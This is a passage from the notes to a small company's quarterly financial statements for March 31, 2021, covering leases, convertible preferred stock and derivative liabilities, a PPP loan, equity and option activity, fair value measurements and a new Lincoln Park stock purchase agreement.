The carrying amounts of the Company’s patent intangible assets were $55,000 and $58,000 as of March 31, 2021 and December 31, 2020, respectively, which includes accumulated amortization of $604,000 and $601,000 as of March 31, 2021 and December 31, 2020, respectively. Amortization expense for patent intangible assets was $3,000 for the three months ended March 31, 2021 and 2020, respectively. Patent intangible assets are being amortized on a straight-line basis over their remaining life of approximately 4.58 years. There was no impairment of the Company’s intangible assets during the three months ended March 31, 2021 and 2020.

The estimated intangible amortization expense for the next five fiscal years is as follows:

Fiscal Year Ended December 31,	Estimated Amortization Expense ($ in thousands)
2021 (nine months)	$9
2022	12
2023	12
2024	12
2025	10
Thereafter	—
Total	$55

Goodwill

The Company annually, or more frequently if events or circumstances indicate a need, tests the carrying amount of goodwill for impairment. The Company performs its annual impairment test in the fourth quarter of each year. In December 2018, the Company adopted the provisions of ASU 2017-04, "Intangibles - Goodwill and Other (Topic 350): Simplifying the Test for Goodwill Impairment". The provisions of ASU 2017-04 eliminate the requirement to calculate the implied fair value of goodwill to measure a goodwill impairment charge. Instead, entities will record an impairment charge based on the excess of a reporting unit's carrying amount over its fair value. Entities that have reporting units with zero or negative carrying amounts, will no longer be required to perform a qualitative assessment assuming they pass the simplified impairment test. The Company continues to have only one reporting unit, Identity Management which, at March 31, 2021, had a negative carrying amount of approximately $22,933,000. Based on the results of the Company's impairment testing, the Company determined that its goodwill was not impaired as of March 31, 2021 and December 31, 2020.

Other Assets

In conjunction with the Lincoln Purchase Agreement, the Company issued to Lincoln Park, in May 2020, 2,500,000 shares of Common Stock as consideration for entering into the Lincoln Purchase Agreement. Pursuant to this issuance, the Company recorded $400,000 as a deferred stock issuance cost. Such deferred stock issuance costs will be recognized as a charge against paid in capital in proportion to securities sold under the Lincoln Purchase Agreement. At March 31, 2021 and December 31, 2020, the Company had approximately $364,000 in deferred stock issuance costs included in the caption “Other assets” in its condensed consolidated balance sheets. During the three months ended March 31, 2021, there were no securities sold by the Company under the Lincoln Park Purchase Agreement. For more information on the Lincoln Purchase Agreement, see our Annual Report on Form 10-K for the fiscal year ended December 31, 2020, as filed with the SEC on April 5, 2021.

NOTE 5.  LEASES

The Company is a party to certain contractual arrangements for office space which meet the definition of leases under ASC 842 – Leases. In accordance with ASC 842, the Company has determined that such arrangements are operating leases and accordingly the Company has, as of January 1, 2019, initially recorded operating lease right-of-use assets and related lease liability for the present value of the lease payments over the lease terms using the Company’s estimated weighted-average incremental borrowing rate of approximately 14.5% as the discount rates implicit in the Company’s leases cannot be readily determined. At December 31, 2020, such assets and liabilities aggregated approximately $1,557,000 and $1,718,000, respectively. At March 31, 2021, such assets and liabilities aggregated approximately $1,462,000 and $1,613,000, respectively. The Company determined that it had no arrangements representing finance leases.

Our corporate headquarters is located in San Diego, California, where we now occupy approximately 500 square feet of office space at a cost of approximately $2,000 per month. We entered into this facility’s lease in February 2021, with the new lease commencing on March 1, 2021 on a month-to-month basis. In addition to our corporate headquarters, we also occupied the following spaces at March 31, 2021:

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

Prior to entering into our current lease agreement in January 2021 and moving our corporate headquarters to a new location, we occupied 8,511 square feet of office space in San Diego, at a cost of approximately $28,000 per month. In January 2021, we entered in a subleasing agreement for our previously occupied corporate headquarters located in San Diego, California. The term of the sublease commenced on April 1, 2021 and expires on April 30, 2025 coterminous with the expiration of the Company’s master lease. Sublease payments due the Company approximate $26,000 per month over the term of the sublease.

The above leases contain no residual value guarantees provided by the Company and there are no options to either extend or terminate the leases.

For the three months ended March 31, 2021 and 2020, the Company recorded approximately $154,000 in lease expense using the straight-line method. Under the provisions of ASC 842, lease expense is comprised of the total lease payments under the lease plus any initial direct costs incurred less any lease incentives received by the lessor amortized ratably using the straight-line method over the lease term. The weighted-average remaining lease term of the Company’s operating leases as of March 31, 2021 is 2.0 years. Cash payments under operating leases aggregated approximately $166,000 for the three months ended March 31, 2021 and $161,000 for the comparable period in 2020 and are included in operating cash flows.

The Company’s lease liability was computed using the present value of future lease payments. The Company has utilized the practical expedient regarding lease and non-lease components and combined such components into a single combined component in the determination of the lease liability. The Company has excluded the lease of its office space in Mexico City, Mexico in the determination of the lease liability as its term is less than 12 months.

At March 31, 2021, future minimum undiscounted lease payments are as follows:

($ in thousands)
2021 (nine months)	$491
2022	653
2023	424
2024	387
2025	128
Thereafter	—
Total	$2,083
Short-term leases not included in lease liability	(14)
Present Value effect on future minimum undiscounted lease payments at March 31, 2021	(456)
Lease liability at March 31, 2021	$1,613
Less current portion	(435)
Non-current lease liability at March 31, 2021	$1,178

NOTE 6.  MEZZANINE EQUITY

Series C Convertible Redeemable Preferred Stock

On September 18, 2020, the Company filed the Series C Certificate with the Secretary of State for the State of Delaware designating 1,000 shares of the Company’s preferred stock, par value $0.01 per shares, as Series C Preferred, each share with a stated value of $10,000 per share. The Company noted that the Series C Preferred instruments were hybrid instruments that contained several embedded features. The Company evaluated the identified embedded features of the Series C Preferred host instrument and determined that certain features met the definition of and contained the characteristics of derivative financial instruments requiring bifurcation at fair value from the host instrument. The Company has bifurcated from the Series C Preferred host instrument the conversion options, redemption option and participating dividend feature in accordance with the guidance in ASC 815. These bifurcated features aggregated approximately $833,000 at issuance and were recorded by the Company as a discount to the Series C.

During the three months ended March 31, 2020, the Company recorded $250,000 as accrued Series C Preferred dividends and recorded the accretion of debt issuance costs and derivative liabilities of approximately $175,000. Concurrently with the issuance of Series D Convertible Redeemable Preferred Stock (described below), all holders of Series C exchanged their shares for shares of Series D Preferred.

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

On December 31, 2020, the Company issued 142 shares of Series D Preferred Stock as payment of dividends due to the Series D Preferred stockholders. During the three months ended March 31, 2021, the Company issued 248 shares of Series D Preferred Stock as payment of dividends due to the Series D Preferred stockholders. During the three months ended March 31, 2021, certain holders of Series D Preferred converted 354 shares of Series D into 6,115,324 shares of Common Stock which includes 42,283 shares of common stock issued for dividends up to the date of conversion.

Guidance for accounting for freestanding financial instruments that contain characteristics of both liabilities and equity are contained in ASC 480, Distinguishing Liabilities From Equity and Accounting Series Release 268 (“ASR 268”) Redeemable Preferred Stocks. The Company evaluated the provisions of the Series D Preferred and determined that the provisions of the Series D Preferred grant the holders of the Series D Preferred a redemption right whereby the holders of the Series D Preferred may, at any time after the fourth anniversary of the Series D Preferred issuance, require the Company to redeem in cash any or all of the holder’s outstanding Series D Preferred at an amount equal to the Liquidation Preference Amount (“Liquidation Preference Amount”). The Liquidation Preference Amount is defined as the greater of the stated value of the Series D Preferred plus any accrued unpaid interest or such amount per share as would have been payable had each such share been converted into Common Stock. In the event of a Change of Control, the holders of Series D Preferred shall have the right to require the Company to redeem in cash all or any portion of such holder’s shares at the Liquidation Preference Amount. The Company has concluded that because the redemption features of the Series D Preferred are outside of the control of the Company, the instrument is to be recorded as temporary or mezzanine equity in accordance with the provisions of ASR 268.

The Company noted that the Series D Preferred instruments were hybrid instruments that contain several embedded features. In November 2014, the FASB issued ASU 2014-16 to amend ASC 815, “Derivatives and Hedging”, (“ASC 815”) and require the use of the whole instrument approach (described below) to determine whether the nature of the host contract in a hybrid instrument issued in the form of a share is more akin to debt or to equity.

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

Using the whole instrument approach, the Company concluded that the host instrument of the Series D Preferred was more akin to debt than equity as the majority of identified features contain more characteristics of debt.

The Company evaluated the identified embedded features of the Series D Preferred host instrument and determined that certain features meet the definition of and contained the characteristics of derivative financial instruments requiring bifurcation at fair value from the host instrument.

The Company has bifurcated from the Series D Preferred host instrument the conversion options, redemption option and participating dividend feature in accordance with the guidance in ASC 815. These bifurcated features aggregated approximately $26,011,000 at issuance and have been recorded as a discount to the Series D. During the three months ended March 31, 2021, the Company recorded the accretion of debt issuance costs and derivative liabilities aggregating approximately $1,817,000 using the effective interest rate method as a deemed dividend.

The following table summarizes the share activity of Series D Preferred for the three months ended March 31, 2021:

Series D Convertible Redeemable Preferred

Total shares of Series D Preferred Stock - December 31, 2020	22,863
Conversion of Series D Preferred into Common Stock	(354)
Issuance of Series D Preferred as payment of dividends due	248
Total shares of Series D Preferred Stock - March 31, 2021	22,757

The carrying value of the Company’s Series D Preferred was approximately $3,391,000 and $1,572,000 net of discount of approximately $19,366,000 and $21,291,000 as of March 31, 2021 and December 31, 2020, respectively.

NOTE 7.  DERIVATIVE LIABILITIES

The Company accounts for its derivative instruments under the provisions of ASC 815, “Derivatives and Hedging”. Under the provisions of ASC 815, the Company identified embedded features within the Series D Preferred host contracts that qualify as derivative instruments and require bifurcation.

The Company determined that the conversion option, redemption option and participating dividend feature contained in the Series D Preferred host instrument required bifurcation. The Company valued the bifurcatable features at fair value. Such liabilities aggregated approximately $22,850,000 and $24,128,000 at March 31, 2021 and December 31, 2020, respectively, and are classified as current liabilities on the Company’s condensed consolidated balance sheets under the caption “Derivative liabilities”. The Company will revalue these features at each balance sheet date and record any change in fair value in the determination of period net income or loss.

The change in fair value of such amounts are recorded in the caption “Change in fair value of derivative liabilities” in the Company’s condensed consolidated statements of operations. For the three months ended March 31, 2021, the Company recorded a decrease to its derivative liabilities using fair value methodologies of approximately $1,172,000 related to Series D embedded derivatives. In conjunction with the conversion of 354 shares of the Company’s Series D Preferred into Common Stock during the three months ended March 31, 2021, the Company recognized a loss on the extinguishment of derivative liabilities of approximately $335,000.

The Company determined that the conversion option, redemption option and participating dividend feature contained in the Series C Preferred host instrument required bifurcation. The Company valued these bifurcatable features at fair value and such liabilities aggregated approximately $172,000 at March 31, 2020. There is no Series C Preferred outstanding at March 31, 2021. The change in fair value of such amounts are recorded in the caption “Change in fair value of derivative liabilities” in the Company’s condensed consolidated statements of operations. For the three months ended March 31, 2020, the Company recorded a decrease to these derivative liabilities using fair value methodologies of approximately $197,000 related to Series C embedded derivatives.

NOTE 8.  NOTES PAYABLE

On March 27, 2020, President Trump signed into law the “Coronavirus Aid, Relief and Economic Security Act (“CARES Act”). On May 4, 2020, the Company entered into a loan agreement (the “PPP Loan”) with Comerica Bank (“Comerica”) under the Paycheck Protection Program (the “PPP”), which is part of the CARES Act administered by the United States Small Business Administration (“SBA”). As part of the application for these funds, the Company in good faith, has certified that the current economic uncertainty made the loan request necessary to support the ongoing operations of the Company. This certification further requires the Company to take into account our current business activity and our ability to access other sources of liquidity sufficient to support ongoing operations in a manner that is not significantly detrimental to the business. Under the PPP, the Company received proceeds of approximately $1,571,000. In accordance with the requirements of the PPP, the Company utilized the proceeds from the PPP Loan primarily for payroll costs, rent and utilities. The PPP Loan has a 1.00% interest rate per annum, matures on May 4, 2022 and is subject to the terms and conditions applicable to loans administered by the SBA under the PPP. Under the terms of PPP, all or certain amounts of the PPP Loan may be forgiven if they are used for qualifying expenses as described in the CARES Act, which the Company continues to evaluate. While no determination has been made at the time of the filing of this Quarterly Report, the Series D Financing may affect the Company's ability to have the PPP Loan forgiven under the PPP. The Company has recorded the entire amount of the PPP Loan as debt. Under the terms of the PPP Loan, monthly payments of principal and interest were due to commence November 1, 2020, however the SBA is deferring loan payments for borrowers who apply for loan forgiveness until the SBA remits the borrower’s loan forgiveness amount to the lender. The Company plans to file for loan forgiveness within 30 days of the filing of this Quarterly Report. At March 31, 2021, the Company has recorded the current portion of the PPP Loan of approximately $1,107,000 as a current liability under the caption “Notes payable, current portion” in its condensed consolidated March 31, 2021 balance sheet. The remaining portion of approximately $464,000 is recorded as a long-term liability under the caption “Note payable, net of current portion” in its condensed consolidated March 31, 2021 balance sheet. At December 31, 2020, the Company has recorded the current portion of the PPP Loan of approximately $918,000 as a current liability under the caption “Notes payable, current portion” in its condensed consolidated December 31, 2020 balance sheet. The remaining portion of approximately $653,000 is recorded as a long-term liability under the caption “Note payable, net of current portion” in its condensed consolidated December 31, 2020 balance sheet.

NOTE 9.  EQUITY

The Company’s Certificate of Incorporation, as amended, authorizes the issuance of two classes of stock to be designated “Common Stock” and “Preferred Stock”. The Preferred Stock may be divided into such number of series and with the rights, preferences, privileges and restrictions as the Board of Directors may determine.

On June 9, 2020, the Company amended its Certificate of Incorporation to increase the number of shares of the Company’s Common Stock and the number of shares of the Company’s Preferred Stock authorized thereunder from an aggregate of 179 million to 350 million, consisting of 345 million shares of Common Stock and 5 million shares of Preferred Stock. On September 28, 2020, the Company received executed written consents from the requisite holders of the Company's voting securities, voting on an as-converted basis, approving an increase in the authorized number of shares of Common Stock from 345 million shares to 1.0 billion shares, with no change to the number of authorized shares of Preferred Stock, which action became effective October 13, 2020. On February 16, 2021, the Company received executed written consents from the requisite holders of the Company's voting securities, voting on an as-converted basis, approving an increase in the authorized number of shares of Common Stock from 1.0 billion shares to 2.0 billion shares, with no change to the number of authorized shares of Preferred Stock, which action became effective April 21, 2021.

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

On September 28, 2020, the Company received executed written consents from (i) the requisite holders of the Company’s voting securities, voting on an as-converted basis, and (ii) the requisite holders of Series A Preferred, voting as a separate class, approving the Amended Series A Certificate, which, among other things, provides for (i) the automatic conversion of all Series A Preferred into Common Stock at a rate of 10% per month following the Closing of the Series D Financing, with the conversion price for such conversion reduced from $1.15 per share of Common Stock, to $0.20 per share of Common Stock, and (ii) a reduction of the dividend rate from 8% of the stated Series A Liquidation Preference Amount if paid in cash and 10% of the stated Series A Liquidation Preference Amount if paid in Common Stock, to 4% of the Series A Liquidation Preference Amount, with the dividends being paid only in shares of Common Stock.

The Company had 6,149 and 14,911 shares of Series A Preferred outstanding as of March 31, 2021 and December 31, 2020, respectively.  At March 31, 2021 and December 31, 2020, the Company had cumulative undeclared dividends of $0.  During the three months ended March 31, 2021, the Company issued the holders of Series A Preferred 1,050,826 shares of Common Stock as payment of dividends due. During the three months ended March 31, 2021, the Company issued 43,819,500 shares of Common Stock upon the conversion of 8,762 shares of Series A Preferred Stock. During the three months ended March 31, 2020, the Company recorded accrued unpaid dividends of approximately $937,000 on its Series A Preferred Stock. There were no conversions of Series A Preferred into Common Stock during the three months ended March 31, 2020.

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

Each share of Series A-1 Preferred was convertible into that number of shares of the Company’s Common Stock (“Series A-1 Conversion Shares”) equal to that number of shares of Series A-1 Preferred being converted multiplied by $1,000, divided by $0.65, or the conversion price as defined in the Series A-1 Certificate in effect as of the date the holder delivers to the Company their notice of election to convert. Holders of Series A-1 Preferred may elect to convert shares of Series A-1 Preferred into Common Stock at any time. In addition to the aforementioned holder conversion option, if the volume weighted average closing price (VWAP) of the Company’s Common Stock is at least $1.00 per share for 20 consecutive trading days, then the Company has the right to convert one-half of the issued and outstanding shares of Series A-1 Preferred into Common Stock. In the event of a Change of Control, the Company will have the option to redeem all issued and outstanding shares of Series A-1 Preferred for 115% of the Liquidation Preference per share.

During July 2020, the Company entered into an Exchange Agreement, Consent and Waiver (“Exchange Agreement”) with certain holders of its Series A Preferred (the "Series A Holders"), pursuant to which such Series A Holders exchanged 18,828 shares of Series A Preferred for an equivalent number of Series A-1 Preferred.

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

 The Company had 5,922 and 14,782 shares of Series A-1 Preferred outstanding as of March 31, 2021 and December 31, 2020, respectively.  During the three months ended March 31, 2021, the Company issued the holders of Series A-1 Preferred 963,266 shares of Common Stock as payment of dividends due. During the three months ended March 31, 2021, the Company issued 44,300,000 shares of Common Stock upon the conversion of 8,860 shares of Series A-1 Preferred.

Series B Convertible Redeemable Preferred Stock

The Company had 239,400 shares of Series B Convertible Preferred Stock (“Series B Preferred”) outstanding as of March 31, 2021 and December 31, 2020. At March 31, 2021 and December 31, 2020, the Company had cumulative undeclared dividends of approximately $21,000 and $8,000, respectively. There were no conversions of Series B Preferred into Common Stock during the three months ended March 31, 2021 and 2020.

Common Stock

As of March 31, 2021, we had 276,749,448 and 276,742,744 shares of Common Stock issued and outstanding, respectively. Our authorized but unissued shares of Common Stock are available for issuance without action by our shareholders.

The following table summarizes outstanding Common Stock activity during the three months ended March 31, 2021:

Common Stock
Shares outstanding at December 31, 2020	180,089,613
Shares issued pursuant to payment of stock dividend on Series A Preferred	1,050,826
Shares issued pursuant to payment of stock dividend on Series A-1 Preferred	963,266
Shares issued pursuant to Series D conversion to Common Stock	6,115,324
Shares issued pursuant to Series A conversion to Common Stock	43,819,500
Shares issued pursuant to Series A-1 conversion to Common Stock	44,300,000
Shares issued pursuant to warrant exercises	400
Shares issued as compensation in lieu of cash	242,647
Shares issued pursuant to RSU vesting	161,168
Shares outstanding at March 31, 2021	276,742,744

Warrants

As of March 31, 2021, warrants to purchase 393,589 shares of Common Stock at prices ranging from $0.01 to $0.80 were outstanding. At March 31, 2021, no warrants are exercisable and become exercisable only upon the attainment of specified events. All warrants expire on September 19, 2028 with the exception of 150,000 warrants whose expiration date is 3 years from initial vesting, such vesting based on certain events. The intrinsic value of warrants outstanding at March 31, 2021 was $0. The Company has excluded from this computation any intrinsic value of the 243,589 warrants issued to the Series A Preferred stockholders due to the conversion exercise contingency associated with these warrants.

The following table summarizes warrant activity for the following periods:
	Warrants	Weighted-Average Exercise Price

Balance at December 31, 2020	753,775	$0.17
Granted	—	$—
Expired / Canceled	(359,786)	$0.01
Exercised	(400)	$0.01
Balance at March 31, 2021	393,589	$0.31

There were no warrants issued during the three months ended March 31, 2021. During the three months ended March 31, 2021, 359,786 warrants were cancelled pursuant to the mandatory conversion of Series A Preferred Stock into Common Stock and 400 warrants were exercised at $0.01 per warrant.

NOTE 10. STOCK-BASED COMPENSATION

Stock Options

As of March 31, 2021, the Company had one active stock-based compensation plan: the 2020 Omnibus Stock Incentive Plan (the “2020 Plan”).

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

Pursuant to the adoption of the 2020 Plan, such plan will supersede and replace the Company’s 1999 Plan and no new awards will be granted under the 1999 Plan thereafter. Any awards outstanding under the 1999 Plan on the date of approval of the 2020 Plan will remain subject to the 1999 Plan. Upon approval of our 2020 Plan, all shares of Common Stock remaining authorized and available for issuance under the 1999 Plan and any shares subject to outstanding awards under the 1999 Plan that subsequently expire, terminate, or are surrendered or forfeited for any reason without issuance of shares will automatically become available for issuance under our 2020 Plan. As of the March 31, 2021, there were 26,511,811 shares available for issuance under the 2020 Plan. The Company amended the 2020 Plan to increase the number of shares of Common Stock available for issuance to 145.0 million shares. Such amendment became effective on April 21, 2021.

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

ASC 718 requires the use of a valuation model to calculate the fair value of stock-based awards. The Company has elected to use the Black-Scholes option-pricing model, which incorporates various assumptions including volatility, expected life, and interest rates. The Company is required to make various assumptions in the application of the Black-Scholes option-pricing model. The Company has determined that the best measure of expected volatility is based on the historical weekly volatility of the Company’s Common Stock. The Company has elected to estimate the expected life of an award based upon the SEC approved “simplified method” noted under the provisions of Staff Accounting Bulletin Topic 14. There were no options granted during the three months ended March 31, 2021 and 2020.

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

            A summary of the activity under the Company’s stock option plans is as follows:
	Options	Weighted-Average Exercise Price	Weighted-Average Remaining Contractual Term (Years)
Balance at December 31, 2020	2,585,500	$0.19	9.2
Granted	—
Expired/Cancelled	(10,831)	$ 0.78
Exercised	—
Balance at March 31, 2021	2,574,669	$0.18	8.9

There were no issuances of options to purchase Common Stock during the three months ended March 31, 2021

During the three months ended March 31, 2021, an aggregate of 10,381 options expired unexercised.

At March 31, 2021, a total of 2,574,669 options were outstanding, of which 110,091 were exercisable at a weighted average price of $1.09 per share with a remaining weighted average contractual term of 6.06 years.  The Company expects that, in addition to the 110,091 options that were exercisable as of March 31, 2021, another 2,464,578 will ultimately vest resulting in a combined total of 2,574,669.  Those 2,574,669 shares have a weighted average exercise price of $0.18 and an aggregate intrinsic value of approximately $0 as of March 31, 2021. Stock-based compensation expense related to equity options was approximately $32,000 for the three months ended March 31, 2021.

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

The Company periodically issues Restricted Stock Units (“RSUs”) to certain employees which vest over time. When vested, each RSU represents the right to that number of shares of Common Stock equal to the number of RSUs granted. The grant date fair value for RSU’s is based upon the market price of the Company's Common Stock on the date of the grant. The fair value is then amortized to compensation expense over the requisite service period or vesting term.

A summary of the activity related to RSUs is as follows:

	RSU’s	Weighted-Average Issuance Price
Balance at December 31, 2020	845,106	$0.14
Granted	—	$—
Expired/Cancelled	(150,935)	$0.13
Vested	(76,167)	$0.13
Balance at March 31, 2021	618,004	$0.14

There were no RSUs granted to employees during the three months ended March 31, 2021. During the three months ended March 31, 2021, 76,167 RSUs vested with the remainder of outstanding RSUs vesting at various times through September 29, 2022.

During the three months ended March 31, 2021 and 2020, the Company recorded compensation expense of approximately $15,000 and $0 related to RSUs. During the three months ended March 31, 2021 and 2020, the Company issued 161,168 and 0 shares of its Common Stock pursuant to the vesting of RSUs.

As of March 31, 2021, the Company has not issued the Common Stock shares pursuant to the vesting of the 808,859 RSUs.

Stock-based Compensation

Stock-based compensation related to equity options and RSUs has been classified as follows in the accompanying consolidated statements of operations (in thousands):

	Three Months Ended March 31,
	2021	2020
Cost of revenue	$1	$2
General and administrative	37	67
Sales and marketing	21	29
Research and development	19	26
Total	$78	$124

NOTE 11.  FAIR VALUE ACCOUNTING

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

	Fair Value at March 31, 2021
($ in thousands)	Total	Level 1	Level 2	Level 3
Assets:
Pension assets	$1,800	$—	$—	$1,800
Totals	$1,800	$—	$—	$1,800
Liabilities:
Derivative liabilities	$22,850	$—	$—	$22,850
Totals	$22,850	$—	$—	$22,850

	Fair Value at December 31, 2020
($ in thousands)	Total	Level 1	Level 2	Level 3
Assets:
Pension assets	$1,881	$—	$—	$1,881
Totals	$1,881	$—	$—	$1,881
Liabilities:
Derivative liabilities	$24,128	$—	$—	$24,128
Totals	$24,128	$—	$—	$24,128

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

As of March 31, 2021, the Company had embedded features contained in the Series D Preferred host instrument that qualified for derivative liability treatment.  The recorded fair market value of these features was approximately $22,850,000 and $24,128,000 at March 31, 2021 and December 31, 2020, respectively, and are classified as a current liability in the condensed consolidated balance sheets as of March 31, 2021 and December 31, 2020. The fair value of the Company’s derivative liabilities is classified within Level 3 of the fair value hierarchy because they are valued using pricing models that incorporate management assumptions that cannot be corroborated with observable market data.  The Company uses Monte-Carlo simulations in the determination of the fair value of derivative liabilities.

Some of the aforementioned fair value methodologies are affected by the Company’s stock price as well as assumptions regarding the expected stock price volatility over the term of the derivative liabilities in addition to the probability of future events. Significant assumptions used in the fair value methodologies during the three months ended March 31, 2021 are a risk-free rate of 0.56%, equity volatility of 103.6%, effective life of 3.75 years and a preferred stock dividend rate of 4%. These assumptions incorporate management’s estimate of the probability of future financings (Series D Financing) and the timing of potential change of control events. The primary assumptions impacted by Series D Financing were the effective life of 3.75 years and equity volatility.

The Company monitors the activity within each level and any changes with the underlying valuation techniques or inputs utilized to recognize if any transfers between levels are necessary.  That determination is made, in part, by working with outside valuation experts for Level 3 instruments and monitoring market related data and other valuation inputs for Level 1 and Level 2 instruments.

The reconciliations of Level 3 pension assets measured at fair value during the three months ended March 31, 2021 and 2020 are presented below:

($ in thousands)	Three months ended March 31, 2021	Three months ended March 31, 2020

Pension assets:
Fair value at beginning of period	$1,881	$1,713
Return on plan assets	15	14
Company contributions and benefits paid, net	2	(10)
Effect of rate changes	(98)	(42)
Fair value at end of period	$1,800	$1,675

The reconciliations of Level 3 derivative liabilities measured at fair value for Series D Preferred Stock during the three months ended March 31, 2021 and for Series C Preferred Stock during the three months ended March 31, 2020 are presented below:

($ in thousands)	Three months ended March 31, 2021	Three months ended March 31, 2020

Derivative liabilities
Fair value at beginning of period	$24,128	$369
Derivative liability from issuance of Preferred Series D	248	—
Decrease in derivative liability from conversions of Preferred Series D	(354)	—
Change in fair value included in earnings	(1,172)	(197)
Fair value at end of period	$22,850	$172

NOTE 11.  RELATED PARTY TRANSACTIONS

Professional Services Agreement

During the year ended December 31, 2020, the Company entered into professional services agreement with a firm affiliated with a member of the Company’s Board at the time the parties entered into the agreement. The Company made no payments pursuant to this agreement during the twelve months ended December 31, 2020 and made payment of approximately $34,000 during three months ended March 31, 2021. The Company has the right to terminate the agreement on thirty days written notice at any time.

NOTE 12.  CONTINGENT LIABILITIES

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

NOTE 13.  SUBSEQUENT EVENTS

Issuance of Common Stock due to Conversions and Vesting of Restricted Stock Units (“RSUs”)

During the period April 1, 2021 through May 20, 2021, the Company issued an aggregate 26,550,242 shares of its Common Stock including 25,950,904 shares of Common Stock for conversions of its Preferred Stocks and 599,338 pursuant to RSU vestings.

Amendment to Certificate of Incorporation

Our Certificate of Incorporation as of March 31, 2021 authorizes a total of 1.0 billion shares of Common Stock for issuance. Effective as of January 28, 2021 and February 16, 2021, respectively, our Board of Directors and the Majority Shareholders approved and authorized an amendment to our Certificate of Incorporation to increase the number of authorized shares of Common Stock from 1.0 billion shares to 2.0 billion shares, resulting in a total increase of 1.0 billion authorized shares of Common Stock.  Contemporaneous with this action, the Company amended the 2020 Omnibus Incentive Plan to increase the number of shares of Common Stock available for issuance under the 2020 Plan to 145.0 million shares. These actions became effective on April 21, 2021.

Creation of Advisory Board and Issuance of Warrants

In April 2021, the Company created an advisory board to the Board of Directors comprised of 3 individuals. As compensation for advisory board services, the Company granted each member warrants to purchase 200,000 shares of the Company’s Common Stock. Such warrants have an exercise price of $0.07 per share and will vest over a one-year period beginning on April 19, 2021.

Issuance of Options

In April 2021, the Company granted an aggregate of 54,050,000 options to purchase shares of Common Stock including 50,700,000 to certain officers and employees and 3,350,000 to certain members of the Company’s Board of Directors. Such options have an exercise price of $0.067 and vest at various times through April 16, 2023. As a condition of issuance of these options, certain employees surrendered an aggregate of 6,520,000 previously issued or contractually promised equity awards and certain members of the Company’s Board of Directors surrendered the right to an initial grant of options to purchase that number of shares of Common Stock equal to $120,000 divided by the fair market value of the Company’s Common Stock as determined on the date of grant as reported on the OTC Markets, and further surrendered an option to purchase that number of shares of Common Stock equal to $60,000 divided by the fair market value of the Company’s Common Stock as determined on the date of grant beginning on the first anniversary and on each annual anniversary thereafter.

Entry into Second Lincoln Park Purchase Agreement

On May 17, 2021 (the "Execution Date"), the Company entered into a purchase agreement, dated as of the Execution Date (the "Purchase Agreement"), and a registration rights agreement, dated as of the Execution Date (the "Registration Rights Agreement"), with Lincoln Park Capital Fund, LLC ("Lincoln Park"), pursuant to which Lincoln Park has committed to purchase up to $15,100,000 of the Company's Common Stock, $0.01 par value per share.

Under the terms and subject to the conditions of the Purchase Agreement, the Company has the right, but not the obligation, to sell to Lincoln Park, and Lincoln Park is obligated to purchase up to $15,100,000 worth of shares of Common Stock. Such sales of Common Stock by the Company, if any, will be subject to certain limitations, and may occur from time to time, at the Company's sole discretion, over the 24-month period commencing on the date that a registration statement covering the resale of shares of Common Stock that have been and may be issued under the Purchase Agreement, which the Company agreed to file with the Securities and Exchange Commission (the "SEC") pursuant to the Registration Rights Agreement, is declared effective by the SEC and a final prospectus in connection therewith is filed and the other conditions set forth in the Purchase Agreement are satisfied, all of which are outside the control of Lincoln Park (such date on which all of such conditions are satisfied, the "Commencement Date"). The Company has until May 31, 2021 to file the registration statement.

Under the Purchase Agreement, on any business day over the term of the Purchase Agreement, the Company has the right, in its sole discretion, to present Lincoln Park with a purchase notice (each, a "Purchase Notice") directing Lincoln Park to purchase up to 250,000 shares of Common Stock per business day (“Regular Purchase”), which (i) increases to up to 300,000 shares in the event the price of the Company’s Common Stock is not below $0.10 per share, (ii) increases to 350,000 shares of Common Stock per Business Day in the event the price of the Company’s Common Stock is not below $0.25 per share, and (iii) increases to 500,000 shares in the event the price of the Company’s Common Stock is not below $0.50 per share (in each case, subject to adjustment for any reorganization, recapitalization, non- cash dividend, stock split, reverse stock split or other similar transaction as provided in the Purchase Agreement). In each case, Lincoln Park's maximum commitment in any single Regular Purchase may not exceed $500,000. The Purchase Agreement provides for a purchase price per Purchase Share (the "Purchase Price") equal to the lesser of:

●	the lowest sale price of the Company's Common Stock on the purchase date; and

●
the average of the three lowest closing sale prices for the Company's Common Stock during the fifteen consecutive business days ending on the business day immediately preceding the purchase date of such shares.

In addition, on any date on which the Company submits a Purchase Notice to Lincoln Park, the Company also has the right, in its sole discretion, to present Lincoln with an accelerated purchase notice (each, an "Accelerated Purchase Notice") directing Lincoln Park to purchase an amount of stock (the "Accelerated Purchase") equal to up to the lesser of (i) three times the number of shares of Common Stock purchased pursuant to such Regular Purchase; and (ii) 30% of the aggregate shares of the Company's Common Stock traded during all or, if certain trading volume or market price thresholds specified in the Purchase Agreement are crossed on the applicable Accelerated Purchase Date, the portion of the normal trading hours on the applicable Accelerated Purchase Date prior to such time that any one of such thresholds is crossed (such period of time on the applicable Accelerated Purchase Date, the "Accelerated Purchase Measurement Period"), provided that Lincoln Park will not be required to buy shares of Common Stock pursuant to an Accelerated Purchase Notice that was received by Lincoln Park on any business day on which the last closing trade price of the Company's Common Stock on the OTC Markets (or alternative national exchange in accordance with the Purchase Agreement) is below $0.25 per share. The purchase price per share of Common Stock for each such Accelerated Purchase will be equal to the lesser of:

●	95% of the volume weighted average price of the Company's Common Stock during the applicable Accelerated Purchase Measurement Period on the applicable Accelerated Purchase Date; and

●	the closing sale price of the Company's Common Stock on the applicable Accelerated Purchase Date.

The Company may also direct Lincoln Park on any business day on which an Accelerated Purchase has been completed and all of the shares to be purchased thereunder have been properly delivered to Lincoln Park in accordance with the Purchase Agreement, to purchase an amount of stock (the "Additional Accelerated Purchase") equal to up to the lesser of (i) three times the number of shares purchased pursuant to such Regular Purchase; and (ii) 30% of the aggregate number of shares of the Company's Common Stock traded during a certain portion of the normal trading hours on the applicable Additional Accelerated Purchase date as determined in accordance with the Purchase Agreement (such period of time on the applicable Additional Accelerated Purchase date, the "Additional Accelerated Purchase Measurement Period"). Additional Accelerated Purchases will be equal to the lower of:

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

The Company has agreed to issue to Lincoln Park 1,000,000 shares of Common Stock as commitment shares in consideration for entering into the Purchase Agreement on the Execution Date.

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

In connection with the execution of the Purchase Agreement, the Company has agreed to sell, and Lincoln Park has agreed to purchase, 1.0 million shares of Common Stock for a purchase price of $100,000 (“Original Purchase”).

Due to the terms of the Purchase Agreement as described above, management is not currently expecting the related proceeds from this agreement to be sufficient to sustain operations for an extended period of time.

The May 17, 2021 Purchase Agreement supersedes and terminates the previous agreement between the Company and Lincoln Park entered into on June 11, 2020.

